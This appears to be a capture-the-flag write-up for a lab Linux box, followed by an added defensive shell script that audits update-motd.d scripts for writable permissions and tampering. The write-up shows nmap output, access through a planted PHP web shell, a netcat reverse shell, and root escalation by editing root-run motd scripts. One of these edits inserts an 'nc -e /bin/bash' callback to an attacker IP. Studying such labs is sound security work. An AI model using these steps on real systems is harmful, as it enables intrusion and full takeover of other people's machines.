```
# Nmap 7.80 scan initiated Mon Mar 23 10:20:21 2020 as: nmap -sC -sV -oN ippsec_scan.txt 10.10.10.181
Nmap scan report for 10.10.10.181
Host is up (0.37s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 96:25:51:8e:6c:83:07:48:ce:11:4b:1f:e5:6d:8a:28 (RSA)
|   256 54:bd:46:71:14:bd:b2:42:a1:b6:b0:2d:94:14:3b:0d (ECDSA)
|_  256 4d:c3:f8:52:b8:85:ec:9c:3e:4d:57:2c:4a:82:fd:86 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Help us
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Mar 23 10:21:10 2020 -- 1 IP address (1 host up) scanned in 49.24 seconds
```
Meanwhile, I ran gobuster and dirb, but there wasn't anything interesting for me.
Getting User Access
80 HTTP Website
Hint: Some of the best web shells that you might need ;), Google it
Found a GitHub repo of web shells.
Tested every webshell filename from it against the URL.
The smevk.php webshell works; the username is admin and the password is admin.
```
$ nc -lvvp 4444
listening on [any] 4444 ...
10.10.10.181: inverse host lookup failed: Unknown host
connect to [10.10.16.99] from (UNKNOWN) [10.10.10.181] 33430
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=1000(webadmin) gid=1000(webadmin) groups=1000(webadmin),24(cdrom),30(dip),46(plugdev),111(lpadmin),112(sambashare)
$ cd /home/webadmin
$ ls -la
total 44
drwxr-x--- 5 webadmin sysadmin 4096 Mar 16 04:03 .
drwxr-xr-x 4 root     root     4096 Aug 25  2019 ..
-rw------- 1 webadmin webadmin  105 Mar 16 04:03 .bash_history
-rw-r--r-- 1 webadmin webadmin  220 Aug 23  2019 .bash_logout
-rw-r--r-- 1 webadmin webadmin 3771 Aug 23  2019 .bashrc
drwx------ 2 webadmin webadmin 4096 Aug 23  2019 .cache
drwxrwxr-x 3 webadmin webadmin 4096 Aug 24  2019 .local
-rw-rw-r-- 1 webadmin webadmin    1 Aug 25  2019 .luvit_history
-rw-r--r-- 1 webadmin webadmin  807 Aug 23  2019 .profile
drwxrwxr-x 2 webadmin webadmin 4096 Feb 27 06:29 .ssh
-rw-rw-r-- 1 sysadmin sysadmin  122 Mar 16 03:53 note.txt
```
In webadmin's home directory, the two files worth looking at are note.txt and .bash_history:
```
$ cat note.txt
- sysadmin -
I have left a tool to practice Lua.
I'm sure you know where to find it.
Contact me if you have any question.
$ cat .bash_history
ls -la
sudo -l
nano privesc.lua
sudo -u sysadmin /home/sysadmin/luvit privesc.lua
rm privesc.lua
logout
```
```
$ cd /etc/update-motd.d/
$ echo "cat /root/root.txt" >> 00-header
```
Host (these two steps have to be carried out in quick succession):
```
$ ssh -i id_rsa webadmin@10.10.10.181
#################################
-------- OWNED BY XH4H ---------
- I guess stuff could have been configured better ^^ -
#################################
Welcome to Xh4H land

cf6c[---------------------------]aefc

Last login: Mon Mar 16 03:50:24 2020 from 10.10.14.2
```
Get root flag~
Alternatively, you can also write a reverse shell into 91-release-upgrade:
```
#!/bin/sh
/tmp/nc -e /bin/bash 10.10.14.194 2345
# if the current release is under development there won't be a new one
if [ "$(lsb_release -sd | cut -d' ' -f4)" = "(development" ]; then
    exit 0
fi
if [ -x /usr/lib/ubuntu-release-upgrader/release-upgrade-motd ]; then
    exec /usr/lib/ubuntu-release-upgrader/release-upgrade-motd
fi
```
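Both root tricks above work only because the scripts in /etc/update-motd.d run as root at every SSH login while the account in the writeup is allowed to change them. As an added example (not part of the original writeup), the script below audits such a directory from the defender's side: it flags scripts with group- or world-writable mode bits and scripts whose content has drifted from a recorded SHA-256 baseline. The directory, file names and contents it creates are constructed stand-ins for /etc/update-motd.d.

```shell
#!/bin/sh
# Added example, not from the writeup: audit an update-motd.d style directory for
#   1. scripts that are group- or world-writable, and
#   2. scripts whose content no longer matches a recorded hash baseline.

# SHA-256 of a file, using sha256sum where present and shasum otherwise.
hash_file() { { sha256sum "$1" 2>/dev/null || shasum -a 256 "$1"; } | cut -d' ' -f1; }

# Print names of regular files in $1 whose mode grants write to group or other.
# Position 6 of the ls mode string is group-write, position 9 is other-write.
find_writable_scripts() {
    for f in "$1"/*; do
        [ -f "$f" ] || continue
        case "$(ls -ld "$f" | cut -c1-10)" in
            ?????w*|????????w*) basename "$f" ;;
        esac
    done
}

# Record "<sha256>  <name>" for every regular file in $1 into baseline file $2.
record_baseline() {
    : > "$2"
    for f in "$1"/*; do
        [ -f "$f" ] || continue
        printf '%s  %s\n' "$(hash_file "$f")" "$(basename "$f")" >> "$2"
    done
}

# Print names of files in $1 that are new or whose hash differs from baseline $2.
find_modified_scripts() {
    for f in "$1"/*; do
        [ -f "$f" ] || continue
        name=$(basename "$f")
        old=$(awk -v n="$name" '$2 == n { print $1 }' "$2")
        [ "$(hash_file "$f")" = "$old" ] || echo "$name"
    done
}

# --- constructed sample directory: clean baseline, then one tampered script ---
SAMPLE_DIR=$(mktemp -d)
BASELINE="$SAMPLE_DIR.baseline"
trap 'rm -rf "$SAMPLE_DIR" "$BASELINE"' EXIT
printf '#!/bin/sh\necho "Welcome"\n' > "$SAMPLE_DIR/00-header"
printf '#!/bin/sh\nuptime\n' > "$SAMPLE_DIR/50-landscape-sysinfo"
chmod 755 "$SAMPLE_DIR/00-header"
chmod 775 "$SAMPLE_DIR/50-landscape-sysinfo"    # group-writable: finding 1
record_baseline "$SAMPLE_DIR" "$BASELINE"
echo 'echo tampered' >> "$SAMPLE_DIR/00-header"   # content drift: finding 2
echo "writable:"; find_writable_scripts "$SAMPLE_DIR"
echo "modified:"; find_modified_scripts "$SAMPLE_DIR" "$BASELINE"
```

On a real host the baseline should be taken from a known-good state (for example right after provisioning) and stored off the box, since anyone who can edit the scripts can also edit a baseline kept beside them.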